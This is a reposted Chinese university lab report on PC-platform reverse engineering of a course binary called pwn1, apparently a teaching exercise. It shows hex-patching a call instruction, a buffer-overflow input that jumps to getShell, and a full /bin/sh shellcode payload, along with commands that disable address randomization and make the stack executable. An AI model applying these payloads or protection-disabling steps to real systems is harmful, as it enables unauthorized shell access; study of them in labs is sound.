20165307《网络对抗技术》Exp1 PC平台逆向破解

最新推荐文章于 2024-07-28 23:42:25 发布
最新推荐文章于 2024-07-28 23:42:25 发布
阅读量91 收藏
点赞数
文章标签: shell 开发工具
原文链接:http://www.cnblogs.com/wangzhe1998/p/10543342.html
版权

实验内容

  1. 手工修改可执行文件,改变程序执行流程,直接跳转到getShell
  2. 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数
  3. 注入一个自己制作的shellcode并运行这段shellcode

知识点描述

掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

  • NOP:无作用。
  • JNE:若不相等则跳。
  • JE:若相等则跳。
  • JMP:无条件转移指令。段内直接短转Jmp short,段内直接近转移Jmp near,段内间接转移Jmp word,段间直接转移Jmp far。
  • CMP:比较指令,它不保存结果,只是影响相应的标志位。

掌握反汇编与十六进制编程器

  • 反汇编指令:objdump -d objfile
  • 十六进制编程器:
  1. 输入命令vi xxx查看可执行文件内容
  2. 按esc后输入:%!xxd将显示模式切换为16进制模式
  3. 输入:%!xxd -r转换16进制为原格式

能正确修改机器指令改变程序执行流程

见实验步骤

能正确构造payload进行bof攻击

见实验步骤

实验步骤

任务一:直接修改程序机器指令,改变程序执行流程

  • 下载目标文件pwn1,用objdump -d pwn1 | more命令进行反汇编:
    1296852-20190316173811803-1558608290.png

vim pwn1
1296852-20190316174059247-423919856.png

esc->:%!xxd 将显示模式切换为16进制模式:
1296852-20190316174226570-562482998.png

找到e8d7,将其修改为e8c3
1296852-20190316174236974-330925785.png

再用objdump -d pwn1 | more命令反汇编看一下,call指令是否正确调用getShell:
1296852-20190316174314624-1921949856.png
1296852-20190316174320256-1633187789.png

./pwn1运行改后的代码,会得到shell提示符#:
1296852-20190316174432425-2142128614.png

任务二:通过构造输入参数,造成BOF攻击,改变程序执行流

objdump -d pwn1 | more命令反汇编:
1296852-20190316174514253-923002729.png

确认输入字符串中哪几个字符会覆盖到返回地址
1296852-20190316174556065-540795451.png

如果输入字符串 1111111122222222333333334444444412345678,那 1234 那四个数会覆盖到堆栈上的返回地址,所以只要把这四个字符替换为getShell的内存地址,输入给pwn1,pwn1就会运行getShell

1296852-20190316174644300-1903059833.png
1296852-20190316175046327-184255737.png
getShell的内存地址,通过反汇编时可以看到,即 0804847d 。应输入11111111222222223333333344444444\x7d\x84\x04\x08
1296852-20190316175103894-259802664.png

构造输入字符串 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input 。然后将input的输入,通过管道符“|”,作为pwn1的输入 (cat input; cat) | ./pwn1

1296852-20190316175131056-73519797.png

任务三:注入Shellcode并执行

修改设置
apt-get install execstack 安装execstack命令
execstack -s pwn1 设置堆栈可执行
execstack -q pwn1 查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space 查询是否关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space 关闭地址随机化
more /proc/sys/kernel/randomize_va_space 查询是否关闭地址随机化
1296852-20190316175257750-165473972.png

2.构造要注入的payload

使用命令 perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode 其中前面32个A用来填满缓冲区buf,\x04\x03\x02\x01为预留的返回地址retaddr:

1296852-20190316182812730-1142605878.png

接下来确定\x4\x3\x2\x1该填什么:

打开一个终端注入这段攻击buf: (cat input_shellcode;cat) | ./20165307pwn1
再打开另外一个终端,用gdb来调试pwn1这个进程:用ps -ef | grep 20165307pwn1命令找到pwn1的进程号是:2854

1296852-20190316182953362-195434236.png

gdb attach 2854 命令启动gdb调试这个进程:

disassemble foo 命令反汇编:

break *0x080484ae 命令设置断点,在进程正在运行的终端敲回车,输入c命令继续运行,使其继续执行。再返回调试终端,使用 info r esp命令查找地址。用x/16x 0xffffd2fc 命令查看其存放内容,看到了0x01020304,就是返回地址的位置。

1296852-20190316183046178-1870091909.png

根据我们构造的input_shellcode可知,shellcode就在其后,所以地址应为 0xffffd300

1296852-20190316183140691-1559876363.png

接下来只需要将之前的\x4\x3\x2\x1改为这个地址即可,用命令 perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

再用 (cat input_shellcode;cat) | ./20165307pwn1命令执行程序,攻击成功

1296852-20190316183251369-522645778.png
1296852-20190316183254705-306774595.png

实验感想

实验收获与感想

在这次实验中实现了缓冲区溢出,加深了我对堆栈的理解。

什么是漏洞?漏洞有什么危害?

漏洞是系统的缺陷,可以使攻击者能够在未授权的情况下访问或破坏系统。

转载于:https://www.cnblogs.com/wangzhe1998/p/10543342.html

weixin_30216561
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20181313毕然《网络对抗技术》——Exp1 PC平台逆向破解
weixin_48745205的博客
03-20 242
网络对抗技术》——Exp1 PC平台逆向破解 一、实践目标 本次实践的对象是一个名为pwn20181313的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。该程序同时包含另一个代码片段getShell,会返回一个可用Shell。正常情况下这段代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。 我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。 四个实践内容如下: 手工修改可执行文件,改变程序执行流程
Exp1逆向及Bof基础实践
04-18
网络对抗实验
2018-2019-2 20165204《网络对抗技术Exp1 PC平台逆向破解
weixin_30778805的博客
03-17 108
2018-2019-2 20165204《网络对抗技术Exp1 PC平台逆向破解 需要描述的内容 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP即“空指令”,执行到NOP指令时,CPU什么也不做,机器码是90 JNE为条件转移指令,如果不相等则跳转。机器码是75。(Jump Not Equal) JE为条件转移指令,相等则跳转。机器码是74.(Jump Equal...
20155218 Exp1 PC平台逆向破解(5)M
03-12 119
20155218 Exp1 PC平台逆向破解(5)M 1. 掌握NOP、JNE、JE、JMP、CMP汇编指令的机器码 NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90) JNE:条件转移指令,如果不相等则跳转。(机器码:75) JE:条件转移指令,如果相等则跳转。(机器码:74) JMP:无条件转...
20155338《网络对抗技术Exp1 PC平台逆向破解
weixin_30247781的博客
03-10 102
20155338《网络对抗技术Exp1 PC平台逆向破解 实践目标 1、实践的对象是一个名为pwn1的linux可执行文件。 2、该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 3、该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。 4、本次实践主要是学...
计算机网络Exp1.pdf
10-18
实验拓扑图主要包括 router、PC、ISP 等设备,实验过程中需要将这些设备连接起来, Configure IP 地址和路由信息,以便实现网络之间的通信。 主要操作步骤 实验步骤主要包括: 1. 拖好所有设备,关闭 router 电源...
exp1.rar_网络编程_matlab_
08-11
在这个"exp1.rar"压缩包中,我们可以看到一个名为"exp1.mdl"的文件,这很可能是MATLAB的Simulink模型文件,专门用来模拟和分析电路系统,特别是SERIES RLC电路。 RLC电路是指包含电阻(R)、电感(L)和电容(C)...
EXP5.计算机网络实验五(2016fa)1
08-03
实验五的主题是构建一个基于VLAN的网络环境,利用两台三层交换机(S3640A和S3640B)、一台路由器(Router1)以及VLAN技术来划分不同部门,同时通过PAT技术实现内网访问Internet。以下是实验的详细知识点: 1. **VLAN...
exp3[1].rar_滤波 exp
09-21
利用窗函数设计FIR滤波器,2、 设计一个线性相位有限冲激响应低通滤波器,使其满足如下指标:通带边界为2kHz,阻带边界为2.5kHz,通带波纹 =0.005,阻带波纹 =0.005,抽样率为10kHz。分别采用多尔夫-切比雪夫窗进行...
【busybox记录】【shell指令】echo
44083579的博客
07-27 224
echo指令用法
shell脚本与sed基本语法
最新发布
m0_74614835的博客
07-28 243
shell
linux系统巡检及shell脚本
qq_63926306的博客
07-27 883
egrep是grep的扩展,支持更多的re元字符, fgrep就是fixed grep或fast grep,它们把所有的字母都看作单词,也就是说,正则表达式中的元字符表示回其自身的字面意义,不再特殊。grep可用于shell脚本,因为grep通过返回一个状态值来说明搜索的状态,如果模板搜索成功,则返回0,如果搜索不成功,则返回1,如果搜索的文件不存在,则返回2。awk 是一种很棒的语言,它适合文本处理和报表生成,其语法较为常见,借鉴了某些语言的一些精华,如 C 语言等。s :取代,可以直接进行取代的工作!
Rust:在Ubuntu22.04上安装
风静如云的博客
07-27 369
尝试后由于网络原因,无法顺利安装。然后编辑rust.sh文件。设置rust.sh为可执行。2.使用国内源进行安装。直接回车选择默认即可。
Aria2 任意文件写入漏洞
山兔的博客
07-28 415
Aria2是一个在命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过–enable-rpc参数启动。Aria2的RPC服务器可以方便的添加、删除下载项目我们可以使用 RPC 接口来操作 aria2 并将文件下载到任意目录,从而造成任意文件写入漏洞。6800 是 Aria2 的 RPC 服务的默认端口。环境启动后,访问 和 服务会返回 404 页面。
【shell】shell循环的几种方式
卷王工作室
07-28 138
shell循环的几种方式
VulnHub:funbox10
Aukum的博客
07-28 720
VulnHub_——FUNBOX: UNDER CONSTRUCTION! 靶机,涉及osCommerce远程代码执行漏洞利用,pspy64提权。
解决Centos不支持docker命令行tab提示问题!!!
lilinhai548的专栏
07-28 78
在使用CentOS操作系统时,有些用户可能会遇到不能自动补全Docker命令的问题。这是因为CentOS默认不支持Docker Tab提示功能,需要手动配置才能实现。在这篇科普文章中,我们将介绍如何解决这个问题,并提供相应的代码示例。
通过gcc宏把版本信息注入到源程序中
weixin_45050132的博客
07-26 259
通过gcc宏把版本信息注入到源程序中
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值